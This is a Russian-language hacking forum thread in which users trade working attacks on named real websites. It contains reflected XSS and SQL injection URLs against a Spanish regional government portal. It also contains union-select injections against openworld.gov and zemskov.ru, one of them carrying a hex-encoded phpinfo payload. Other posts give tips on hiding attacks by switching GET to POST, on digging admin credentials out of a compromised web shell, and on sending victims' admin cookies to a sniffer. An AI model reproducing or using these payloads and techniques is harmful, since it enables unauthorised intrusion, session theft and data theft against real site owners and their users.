кто-нибудь выложите ссылки на темы в этом форуме относительно того как не палить баг в get-параметрах . слыхал что страницу сохраняют, потом get меняют на post . а как точно ? надоело, засекают сразу
FarIZ, Вот тут если у вас Firefox Перед использованием проверьте что уязвимость доступна через POST, не всегда это бывает...
есть сайт http://www.juntadeandalucia.es я росканил хспайдером мне дало интиресну весч Данная версия вебсервера Apache содержит chunked encoding уязвимость, что, помимо выведения сервера из строя, позволяет атакующему выполнить произвольный код, если сервер работает под управлением ОС FreeBSD, OpenBSD или NetBSD. и 2 Возможно выполнение атаки межсайтовый скриптинг. Межсайтовый скриптинг (Cross site scripting или XSS) это возможность вставки HTML кода в уязвимую страницу. Инъекция кода осуществляется через все доступные способы ввода информации. Успешное завершение атаки может привести к использованию значений различных переменных, доступных в контексте сайта, записи информации, перехвату пользовательских сессий и т.д. http://222.zone-217.12.16.juntadeandalucia.es:8081/webct/ticket/ticketLogin?action=print_login&request_uri=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22 как можна использовать ету уязвимость еть у кого ссылки на ету инфу буду благодарен ... я пытался вдудлить туда XSS но ничего не дало желательно примеры ли ресурсы такие по теме а не посылать в гугл я там был и там нех нету ... хацкеры жду помощи )
теща sql иньеция http://www.juntadeandalucia.es/servicioandaluzdesalud/hpm/neumologia/noticias.php?id=-2295+or+1=1-- http://www.juntadeandalucia.es/averroes/~cepja4/html/menu.3.php?codigo=092321GT54' а так же раскрытие путей /mnt/centr2/41/41000612/includes/database.php нащет хсс.. подкидывай сыслку админку и его куки летят тебе на снифер
Ребята такой вопрос! Где могут сохранятся пароли от админки cayt/admin ! В phpadmin ничего не нашел доступ из шел только в папки сайта! Где они могу прятятся пароли?
Шелл есть? Есть доступ к скриптам? Посмотри, в одном из них могут храниться данные для доступа к БД. например cayt/admin/index.php
да есть! Я вотчитал его не не могу разобратся! просто я начинающий может дам посмотришь его? есть login.php и index.php
http://www.openworld.gov/news/gallery.php?id=-1'+union+select+version()/* http://www.openworld.gov/phpMyAdmin/ phpMyAdmin есть но нет таблицы с юзерами.......как я понял я нервно курю в сторонке, т.к мне прав не хватает прочитать таблицы phpMyAdmin'а?
В таком случае встречный вопрос, таблицу с юзерами от чего ты ищешь, реги так сказать я там тоже не наблюдаю... хотя если только на поддомене: dd.openworld.gov жаль акка нет, регаться влом... насчет форума точно сказать не могу... скорее всего был когда то а таблицы не снесли...
+++AndreyDevil+++, ОМГ =) а ничего что форум может быть вовсе не здесь, а на соседнем сайте? reverse-ip вам в руки =) а так еще проще concat_ws(0x3a,TABLE_SCHEMA,TABLE_NAME) тогда будете еще знать в какой БД данная таблица, может дать наводку где это искать...
+++AndreyDevil+++ phpbb - скелет в шкафу он там когдато был(проверь по гуглу ), форум снесли , а таблицы забыли.
http://web.archive.org/web/20031121221659/http://www.openworld.gov/ был, теперь нету.. ищи то, куда можно подставить данные из sys_user
Здравствуйте Вопрос на сайте www.sait.ru/new's.html Пишет: You have an error in your SQL syntax... и.т.д можно ли делать запрос, и kak вообще это должно выглядит. пробовал так: www.sait.ru/news+group+by+1+.html Неправильно )))
А если так? Code: http://www.sait.ru/news+group+by+1/*.html http://www.sait.ru/news/**/group/**/by/**/1.html Вообще там mod_rewrite. ВОзможно скуль с посимвольным......
www.zemskov.ru таких вообще много где в конце .html но толком не знаю kak делать запрос. кто нибудь может показать на примере или мост есть статья .
Забавная инъекция Code: http://www.zemskov.ru/e_mail' and 1=2 union select 1,0x706870696e666f28293b,3,4,5,6,7,8,9,10,11,12,13,14,15+--+.html